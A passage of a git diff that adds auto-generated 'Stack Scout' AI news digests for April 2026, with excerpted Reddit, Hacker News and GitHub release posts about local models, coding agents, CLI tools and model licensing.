One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples. HuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal GitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/ MIT licensed. The repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and + +--- + +## [Gemma 4 - Going Mad - - - Help!!!](https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: cli_tool + +> Hi All Im getting up to speed on LLMs and we are looking at Gemma4. We are using a M3 Ultra with 512GB VRAM. So no dangers there. Im using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling. I have re-downloaded all the models this morning post the fixes. These are the unsloth ones. Im running llama.cpp - which i build on the server and is bang up to date. So in opencode CLI - if i give it this prompt - its runs + +--- + +## [Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)](https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: cli_tool + +> I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff. Tried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists. 
It includes: • local models (Ollama, Qwen, Llama etc) • free LLM APIs (OpenRouter, Groq, Gemini etc) • coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) • RAG stack tools (vector DBs, embeddings, frameworks) • agent frameworks and automati + +--- + diff --git a/data/digest-2026-04-12.md b/data/digest-2026-04-12.md new file mode 100644 index 0000000..00cfb87 --- /dev/null +++ b/data/digest-2026-04-12.md @@ -0,0 +1,83 @@ +# Stack Scout - AI News Digest +**2026-04-12** | 10 stories | Auto-generated from 109 archived stories + +--- + +## [JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.](https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/) +*Reddit r/ClaudeAI* | 12/04/2026 | Score: 1.00 +Tags: mcp, cli_tool, agent_tool + +> One instance is enough, but where is the fun in that right? 🤣 JARVIS across 3 servers, each running a different AI coding agent: \- Hel2: Claude Code CLI \- Hel1: Cursor CLI \- Mainframe: OpenCode They talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. Same JARVIS, different hands. They don't just run. They coordinate. Video is all 3 tmux sessions open at o + +--- + +## [Openclaw real costs: self hosting vs managed hosting vs API fees](https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/) +*Reddit r/ChatGPT* | 12/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth? 
+ +--- + +## [OK I installed bitsandbytes but still getting error - Help please - thanks](https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> Used terminal and installed it like so: pip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\_main/bitsandbytes-1.33.7.preview-py3-none-win\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl) Getting error and StableDiffusion does not run File "C:\\Users\\123\\Downloads\\StabilityMatrix-win-x64\\Data\\Packages\\ + +--- + +## [Meta released new paper : Neural Computers](https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: cli_tool + +> What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\_jA?si=0h0bnM7qUsqDcKCJ paper : https://arxiv.org/abs/2604.06425 + +--- + +## [Open source agent stack that actually works in 2026 (no hype)](https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: open_source + +> been running this setup for a few months and wanted to share what actually works vs whats just github stars hermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. 
your agent on day 30 actually knows your projects and preferences everything c + +--- + +## [MiniMax M2.7 is NOT open source - DOA License :(](https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: open_source + +> Commercial use is banned without prior written permission from MiniMax. And their definition of "commercial" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting. So you can't use the model or any outputs for anything commercial! I'm really starting to hate these "open weights, closed license" models... https://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE + +--- + +## [Does LTX 2.3 have good motion transfer?](https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 0.94 +Tags: open_source + +> What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one? + +--- + +## [This is so good](https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/) +*Reddit r/ClaudeAI* | 12/04/2026 | Score: 0.86 +Tags: api_update + +> Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. 
+ +--- + +## [It seems ChatGPT leaked a JSON response (including API enpoint)](https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/) +*Reddit r/ChatGPT* | 12/04/2026 | Score: 0.86 +Tags: api_update + +> idk if this is visible in network requests, but chatgpt responded with \[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\n "error": {\\n "message": "You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.",\\n "type": "images",\\n "param": nul + +--- + +## [MiniMax M2.7 Is Now Open Source](https://firethering.com/minimax-m2-7-agentic-model/) +*Hacker News* | 12/04/2026 | Score: 0.74 +Tags: open_source + +--- + diff --git a/data/digest-2026-04-14.md b/data/digest-2026-04-14.md new file mode 100644 index 0000000..3c0afc1 --- /dev/null +++ b/data/digest-2026-04-14.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-14** | 15 stories | Auto-generated from 271 archived stories + +--- + +## [hands on workshop: context engineering for multi agent systems [D]](https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/) +*Reddit r/MachineLearning* | 13/04/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update, agent_tool + +> hey everyone, sharing this because it's directly relevant to what a lot of people here are building. packt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman. 
what gets covered: \- semantic blueprints for multi agent orchestration \- MCP integration for standardized agent tool use \- context window management across agents \- high fidelity RAG pipelines with verifiable citations \- safeguards against prompt injection and + +--- + +## [Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)](https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/) +*Reddit r/ClaudeAI* | 14/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware) We recently added Docker Sandbox support and I wanted to share it here. The idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal. `npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje + +--- + +## [How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source](https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/) +*Reddit r/ChatGPT* | 14/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. AgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic. Each Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. 
And they're s + +--- + +## [pnpm v10.33.0 released](https://github.com/pnpm/pnpm/releases/tag/v10.33.0) +*GitHub Releases · pnpm* | 24/03/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +> ## Minor Changes * Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070). ## Patch Changes * Fail on incompatible lockfiles in CI when + +--- + +## [Gemini CLI v0.37.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2) +*GitHub Releases · Gemini CLI* | 13/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2 + +--- + +## [Turbo v2.9.6 released](https://github.com/vercel/turborepo/releases/tag/v2.9.6) +*GitHub Releases · Turbo* | 10/04/2026 | Score: 0.92 +Tags: github_release, tool_update + +> ## What's Changed ### create-turbo * chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586 ### Examples * fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585 ### Changelog * docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul + +--- + +## [We're all building on top of something that changes under us every week, and nobody has a plan for that](https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/) 
+*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.90 +Tags: api_update, tool_update + +> I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation. Every week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g + +--- + +## [Vercel CLI vercel@51.2.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1) +*GitHub Releases · Vercel CLI* | 14/04/2026 | Score: 0.84 +Tags: api_update, cli_tool + +> ### Patch Changes - Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744)) - Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653 + +--- + +## [Gemini CLI v0.38.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0) +*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 1.00 +Tags: cli_tool + +> ## What's Changed * fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454 * Update README.md for links. 
by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759 * fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437 * feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https:// + +--- + +## [My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)](https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: api_update + +> I'm not sure if the AesSedai's Q5\_K\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. I did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. Minimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but + +--- + +## [Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)](https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385) I've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction? Main result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern. 
A mid-layer 'gate' attention head reads a detection-layer represe + +--- + +## [Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan](https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/) +*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model" [Source](https://x.com/DylanTFWang/status/2043952886166761519) The launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay. ## What HY-World 2.0 does HY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments + +--- + +## [Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.](https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: tool_update + +> Reddit r/LocalLLaMA — 9 upvotes, 14 comments + +--- + +## [2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me](https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: agent_tool + +> Hello, I've been on a quest to get something "close enough" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience. I tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now. 
So I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total + +--- + +## [Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday](https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/) +*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon) + +--- + diff --git a/data/digest-2026-04-15.md b/data/digest-2026-04-15.md new file mode 100644 index 0000000..fd9b9a8 --- /dev/null +++ b/data/digest-2026-04-15.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-15** | 15 stories | Auto-generated from 418 archived stories + +--- + +## [Qwen Code v0.14.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5) +*GitHub Releases · Qwen Code* | 15/04/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +> ## What's Changed * feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916 * feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232 * feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936 * feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p + +--- + +## [MCP vs API?](https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/) +*Reddit r/ClaudeAI* | 15/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. 
To me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context. I have heard a lot of people say that API is + +--- + +## [Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal](https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> Hey everyone, I built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily. What it does: * Runs OpenCode sessions inside a VS Code webview sidebar * Automatically uses whatever workspace folder you have open * Can auto-start a local OpenCode server when you open the sidebar * Keeps your session a + +--- + +## [Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail](https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say "task complete" 47 times but did it actually do 47 different things or did it just loop the same task over and over? I had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. 
It just kept doi + +--- + +## [[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]](https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/) +*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> TL;DR: Fine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available. \--- The Problem Chatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers + +--- + +## [Claude Code on desktop, redesigned for parallel agentic work.](https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/) +*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +> New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. New tools make it easier to complete work without leaving the app. Integrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal. 
Plus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p + +--- + +## [I built a CLI that scans your project and auto-installs matching skills for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/) +*Reddit r/ClaudeAI* | 15/04/2026 | Score: 0.96 +Tags: developer_tool, cli_tool + +> Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow. skillgrab does this: 1. Scans \`package.json\`, \`requirements.txt\`, \`pubspec.yaml\`, \`go.mod\`, \`Dockerfile\`, \`vercel.json\`, etc. to detect your stack 2. Reads your README for non-code hints ("landing page", "pricing", "SEO") and asks if you want marketing/design/sales skills 3. Queries [skills.sh] + +--- + +## [Gemini CLI v0.38.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1) +*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1 + +--- + +## [MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?](https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/) +*Reddit r/midjourney* | 15/04/2026 | Score: 1.00 +Tags: product_launch + +> A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows: **Is it really better, or is it just new?** With MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way. 
Instead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.** The goal was sim + +--- + +## [Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.](https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: tool_update + +> I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it. ChatGPT has likely felt "nicer" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo + +--- + +## [Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details](https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: cli_tool + +> Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model. I am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples. 
Here is github repo where I have added the [researc + +--- + +## [Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?](https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something + +--- + +## [Lyra 2.0 : Explorable Generative 3D Worlds](https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/) +*Reddit r/StableDiffusion* | 15/04/2026 | Score: 1.00 +Tags: developer_tool + +> Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. Generating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: Maintaining per- + +--- + +## [[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book](https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> I wrote a book that implements modern LLM architectures from scratch. 
The part most relevant to this sub: Chapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B: 1. LayerNorm → RMSNorm 2. Learned positional encodings → RoPE 3. GELU → SwiGLU 4. Multi-Head Attention → Grouped-Query Attention Then loads Meta's real pretrained weights. Chapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation, + +--- + +## [Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]](https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/) +*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process. What's covered: * Vanilla encoder-decoder transformer (English to Hindi translation) * GPT-2 (124M), loading real OpenAI pretrained weights * Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights * KV cache mechanics, MQA, GQA * DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled + +--- + diff --git a/data/digest-2026-04-16.md b/data/digest-2026-04-16.md new file mode 100644 index 0000000..7f5aad9 --- /dev/null +++ b/data/digest-2026-04-16.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-16** | 15 stories | Auto-generated from 396 archived stories + +--- + +## [Vercel CLI vercel@51.5.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1) +*GitHub Releases · Vercel CLI* | 16/04/2026 | Score: 0.92 +Tags: developer_tool, cli_tool, tool_update + +> ### Patch Changes - Improve Claude Code Vercel plugin install and update prompts across CLI commands. 
([#15921](https://github.com/vercel/vercel/pull/15921)) - Updated dependencies \[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi + +--- + +## [I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline](https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/) +*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot So, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface. I wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do: **"Clon + +--- + +## [anyone else notice labs are getting more secretive about their best models?](https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/) +*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with "restricted access" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier. google dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. 
meta's doing multimodal reasonin + +--- + +## [Mozilla Announces "Thunderbolt" As An Open-Source, Enterprise AI Client](https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Reddit r/LocalLLaMA — 4 upvotes, 3 comments + +--- + +## [Qwen3.6-35B-A3B released!](https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀 A sparse MoE model, 35B total params, 3B active. Apache 2.0 license. \- Agentic coding on par with models 10x its active size \- Strong multimodal perception and reasoning ability \- Multimodal thinking + non-thinking modes Efficient. Powerful. Versatile. Blog:https://qwen.ai/blog?id=qwen3.6-35b-a3b Qwen Studio:chat.qwen.ai HuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B ModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B + +--- + +## [Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)](https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/) +*Reddit r/ClaudeAI* | 16/04/2026 | Score: 1.00 +Tags: mcp, open_source + +> Claude already has memory — but it's a black box. You can't see what it knows, what decisions were made, or how your project is progressing. Dendrite makes Claude's memory visible. How it works: - Claude writes structured memory slices via MCP (decisions, observations, tasks, open questions) - You see everything in a searchable 3-pane reader - Set your own preferences that Claude pulls from on every session - Track project progress, o + +--- + +## [Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. 
